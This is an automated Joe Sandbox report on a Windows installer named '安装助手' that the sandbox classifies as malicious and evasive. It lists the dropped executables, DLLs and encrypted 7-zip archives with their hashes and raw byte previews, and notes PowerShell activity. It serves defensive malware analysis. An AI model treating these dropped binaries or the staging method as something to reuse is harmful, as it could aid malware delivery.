        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580229
        Start date and time:2024-12-24 04:51:11 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 17s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:110
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U52a9#U624b1.0.1.exe
        renamed because original name is a hash value
        Original Sample Name:1.0.1.exe
        Detection:MAL
        Classification:mal84.evad.winEXE@116/33@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 77%
        • Number of executed functions: 28
        • Number of non-executed functions: 76
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
        • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        22:52:02API Interceptor1x Sleep call for process: #U5b89#U88c5#U52a9#U624b1.0.1.tmp modified
        22:52:05API Interceptor38x Sleep call for process: powershell.exe modified
        No context
        No context
        No context
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
          #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):831200
                            Entropy (8bit):6.671005303304742
                            Encrypted:false
                            SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                            MD5:84DC4B92D860E8AEA55D12B1E87EA108
                            SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                            SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                            SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):2603681
                            Entropy (8bit):7.9999250486601365
                            Encrypted:true
                            SSDEEP:49152:CAQF5rEv9l8kq6OyoWZqzEwn9192vEpJ9syz09uPhPTehqd9zQwp7N8WyAhlBi:GFxEFCwiWDwn91vJ9Dzhd90wpRgH
                            MD5:3B9FD0924DB73BAA952BEB4A7BD7D6DE
                            SHA1:66C0C97BBF4B25A31F35CB8029593B472BE5F056
                            SHA-256:4A293DA92330E5FE2BD56DD600E245E2AB9BCAA15FA091BB04E60C6B23C3EF95
                            SHA-512:41CD19F53535FBC592C050AE70B40BB82799A9A955B516446864961E5E559EAC2B6AA7E0A47BF89FAB5B38A754EC426076635E514C0D1E87BEBCAA66C5E8E402
                            Malicious:false
                            Preview:.@S....+.YN.F..............4.%..6W.Bi6..B.i.|.M...>~rcE...2.@o.1....:..Y. ..j!}.).d..pi..T-......l.....`.W.T~.........Q...|..W.......,./..Z{..FqaLj.....o.+9N./....5..3Ix......i.i$C&.O}.Z..?..1-4.=....zw..5.N8.I;.D..Tv..@.....e\,?.7.Kx.6<S3kd.2...`..rd<..........N%..........=...V...#.._...#.m...V.L...'..W..T..5.u.A....g.fg).....FB....8....w../.......&Lts.3.{.S.c...dX.2.S..e......ls.WE.N.|l...3h!..a.M.K......lh.`............t.w}..,......adq]<.y;.....a.....$.c.tJ.U.l..Z.',.....:..2....:..5.....S[.98.cF..DL.F.o.<.o3K.*.h....f....i2%.........zIkZ.._.gh...@.h.u..-z.A..G...e..[...%..7.........'..{x>@A...&...(..UQ../..ZD.N...i..q.5&}.].<...(.wr...f.M....pn...UW^.....\...V..s....E...s._..~nv.%t,.........qQ..U...;)..wA...O.WB.x.,....N...{..._.{.w;..5..a.r.zY|b...l6...*.p.f........k.....o.0.+..ihu.,.^>.9vV..f.p.6~.2pf...j.@....wLO.kwhF.....3.wW.Y4..^...td}....Z...\...E..st4(.{,.\.W..4.....g.yq....G.^8..n..U<I.mS".....K.q........@@..e?.x3....
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:false
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):2603681
                            Entropy (8bit):7.9999250486601365
                            Encrypted:true
                            SSDEEP:49152:CAQF5rEv9l8kq6OyoWZqzEwn9192vEpJ9syz09uPhPTehqd9zQwp7N8WyAhlBi:GFxEFCwiWDwn91vJ9Dzhd90wpRgH
                            MD5:3B9FD0924DB73BAA952BEB4A7BD7D6DE
                            SHA1:66C0C97BBF4B25A31F35CB8029593B472BE5F056
                            SHA-256:4A293DA92330E5FE2BD56DD600E245E2AB9BCAA15FA091BB04E60C6B23C3EF95
                            SHA-512:41CD19F53535FBC592C050AE70B40BB82799A9A955B516446864961E5E559EAC2B6AA7E0A47BF89FAB5B38A754EC426076635E514C0D1E87BEBCAA66C5E8E402
                            Malicious:false
                            Preview:.@S....+.YN.F..............4.%..6W.Bi6..B.i.|.M...>~rcE...2.@o.1....:..Y. ..j!}.).d..pi..T-......l.....`.W.T~.........Q...|..W.......,./..Z{..FqaLj.....o.+9N./....5..3Ix......i.i$C&.O}.Z..?..1-4.=....zw..5.N8.I;.D..Tv..@.....e\,?.7.Kx.6<S3kd.2...`..rd<..........N%..........=...V...#.._...#.m...V.L...'..W..T..5.u.A....g.fg).....FB....8....w../.......&Lts.3.{.S.c...dX.2.S..e......ls.WE.N.|l...3h!..a.M.K......lh.`............t.w}..,......adq]<.y;.....a.....$.c.tJ.U.l..Z.',.....:..2....:..5.....S[.98.cF..DL.F.o.<.o3K.*.h....f....i2%.........zIkZ.._.gh...@.h.u..-z.A..G...e..[...%..7.........'..{x>@A...&...(..UQ../..ZD.N...i..q.5&}.].<...(.wr...f.M....pn...UW^.....\...V..s....E...s._..~nv.%t,.........qQ..U...;)..wA...O.WB.x.,....N...{..._.{.w;..5..a.r.zY|b...l6...*.p.f........k.....o.0.+..ihu.,.^>.9vV..f.p.6~.2pf...j.@....wLO.kwhF.....3.wW.Y4..^...td}....Z...\...E..st4(.{,.\.W..4.....g.yq....G.^8..n..U<I.mS".....K.q........@@..e?.x3....
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:OpenPGP Secret Key
                            Category:dropped
                            Size (bytes):2353553
                            Entropy (8bit):7.99992611421159
                            Encrypted:true
                            SSDEEP:49152:rtfmdyArF7jC2uzD04c4vtHlkTmMVDfFv3ARw3ieIXzFj0nHfh:roDrBKxxlkq0fNAW3ieIXzuZ
                            MD5:73616E6FB705D7163A2D8A391DDCAD6C
                            SHA1:2ADEE96903C346D920E7B7B7527BE089F8388D87
                            SHA-256:4AE1FF98AEC7817FF9E35A15118CFBD61CCF00C766ABE08C4EEFB58889EDF04E
                            SHA-512:74D4726E6593783D062AFB2703C1B6465019C247DD2468B657AD95413BC4A3707F9D2695D9BE3CA51C9590A28C3ED22DDC52615F10F742A4432CD3A72A3A18FD
                            Malicious:false
                            Preview:....;.3......v.D.8.Wg..y.v.....u....Bwa...]`t...~..-..n.........9l..v.I}gwwT..7H.t?..6.G.x.-'7....]$...iq~....J`........$...(..m.z....,y..2C7.?...O...D.._..dP.&;....n .....a..l...#R......K.[&.eb.\&B..M..d .[.<.t\..W..,$........;@..........?.x..$+..Z...:.f....i.WL'..g .Xv1V....[f..._........+'.T.9..%...../v_)...G0........`(.J1+....U.l.9..2........Y..._K.....z.-......$..@E..c.J..c....B....h.;.5..2*I7>....e.L...R..M.0"jz'.....g......:...A.?s...]C3?.%.....;.."..1........\Q...d+..Z...:-..M.Q.o.P...Y...`%O..I.f?.Kb...2./'].?Qq....+f..)..g*["9.0.S..T+A...Z..v....Y...uR(.....3....&kD....D.+..v......Of,.D....Vz.9.9jZ.d...f...c..m.[Y....|5.jV.....Oq...5.t|.. N.P..~...a...5.......3.<++'...=..<.....l..!_.o9L.:..y..g.T.\...H.@....../t..<L.F.q1..B.!.9+|.s}e4.j*Zbg_W..t..{.&xY.q.8.=M...8.O..x..._]6h%....g.....~.O..........$..p.~!.E[.*!.+b.EH.......)..2.).KH.....(p...%u......!.t\+.....R. .$.ir...m.L+IC...OD....:26..y.j.x<L.?u.R.........x...........[.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56514
                            Entropy (8bit):7.996871451143694
                            Encrypted:true
                            SSDEEP:1536:mPAiXXCuGhffQfTWvMcdyw9W0wV/JQ+PX7D0sC1pr7MN2c3:mL5iQfTWvM9/S+/0fMAM
                            MD5:F8884F03FE2A94096CD9DB4DFFE29A40
                            SHA1:A139A68287F4E3FF9486273AA0E8CE16432CF819
                            SHA-256:5D3E892B057465CC9D66CF84268CA7FBB040EF8A797653B99597E6E9DDA16D35
                            SHA-512:F3EAC63B1A4D05BAEC1CD79522D8B65EB9F72E6F72DD4A38C62FF90165067266A08E0CEC9A9DBF6E1C68D228B0E89D37A83C68B334AF22ADD23CD3E9C7F20390
                            Malicious:false
                            Preview:.@S....f... ..............`.......uw..R.).......\.3...Wz......7v#....$D....+.V.}....r.!.!..&.y}.t......K%sG.6.W|m..'.v...jZ!.j6nd....u$.P}..$..a34c..K.R...5H...."..c....4.......M..7g.G..6..Y.e..~.....d....;Gn._o .G.qp...J..ao.z[...F%.S...&...J>@...............RF....P.>`.....K22.......[dgUc.R..R.U......D.my...|...qOvRO...}.)!VD'c...(....R...zi~U..zZV.ps._....iw..v....{..!..x.6....nH......o.......g...{....[.f...NA......l.2..bP.Ng...T..0...u..c..^.Y..n.\.&.#...rn...#.Vk[G.#.?....Z'|.:e..A.].4..B..?=K..Y..~.aqp...H....V..t....'.=...e.X.t......}....N..\.|..VZ..).Fr.....X..n9...6..Y..o.ZWi...1...*..[.A.e.l....).r..2]...Q<O$$d./!.?..f\..7a.'..tfh.5Dz:..i..r1M.w..U.y......1...J ...o.2...0.{..).Zf.....S....j.TQ..!....T.0p?..+.T...rG.D.x:3......f.D8....nT.v..nK...cT......}.1.r...<..&.?V..F...u.....x..z..'...5l...*.?.....W..=.G......Q...\.....b..Q..I..d-...].[-?O.Q........u..2.=`<W.Z~..w..8P.$~..Y..=..B...l....8..A.h\....c.G..fqu,0...lI.]Bv.m.4....j....q....
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56514
                            Entropy (8bit):7.9968714511436945
                            Encrypted:true
                            SSDEEP:1536:HokFPP32DIjpUKb0m13fiDdCu3ELc3d5wbMjeYIcJLYuJUWLxMBRc:Ho4PP6gb0OYdCcELwYtYIcJL32WiBRc
                            MD5:F872271BC29C420B64116E4FA31D04DC
                            SHA1:E009BDDF7E43633678F6259524E8AFF6EC85103D
                            SHA-256:081F6BD3EC3B5F9EE39F42942DD608C96134AE459734B031132DBF92ACBE751A
                            SHA-512:1803172A6CD5BA42CA257F057602CBBCC511CCB85FE86495C5708A2AE6563C40966E27A2C8768B8363ABD1A4028EAB53C7F81BDFADE9384CAB99A71B9B509A2C
                            Malicious:false
                            Preview:7z..'...... p.......2...........G`.k...2........%6.T..f.v...}/..&.^b...05.l..&.J;..W.s.Mw.a...s.>2t? ..i...G.....e..P..|..h...Z..1..%..`.XP.Bp....i...t...B8....\.n.)..m..j..n~.[..b.se.....E..R.Sm)..('IE..!p...~......r..V..$P..4fB.....V..N.....K.1wP...0okz.YL.g(.~.....2<.....U.=........4^.x.=...$.LG.0..V).........3.p"Z.H......../.P0.(>......L..........S.T..h+.5.0=.h..H..V;...$.. .G..}.n:4!9.9V]Y..9.....=G..G.OE+.0./...7..B!3.<..P6.z.&...a.P.r........ci .-....q.S.ys.l.....Z. ...O{.......&.^p.>....O..,GK.m..8...K....,.c.U....-.Z..I.p/.j2H.!......X..,.h.L..5..6...E..u....U~U..{)..6J..*.s..~n.p.]......n.....,....].O=.e.my........i.As....rP....Z.2....V..5...U.......".....$3.o.P.....3.I...3..9<N.~..*xQ...qi....[....,4Uh.d(.1H..Q.l9.....I...(9....;..7.=...M....y.|..4..1..vY#.@.8.Y.}2.E<..gP*...\{.....X.m.f.+4...b|....swd....<...2g.. Sr......>.&....hl.e.......U..Y.....{.p0.y..'..O.<.}.d*.T;.._/zHM....3.....EFp.."q.....r.*R....h7\....:
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255975
                            Encrypted:true
                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                            Malicious:false
                            Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255979
                            Encrypted:true
                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                            MD5:4CB8B7E557C80FC7B014133AB834A042
                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                            Malicious:false
                            Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                            MD5:8622FC7228777F64A47BD6C61478ADD9
                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                            Malicious:false
                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                            Malicious:false
                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.99759370165655
                            Encrypted:true
                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                            MD5:950338D50B95A25F494EE74E97B7B7A9
                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                            Malicious:false
                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
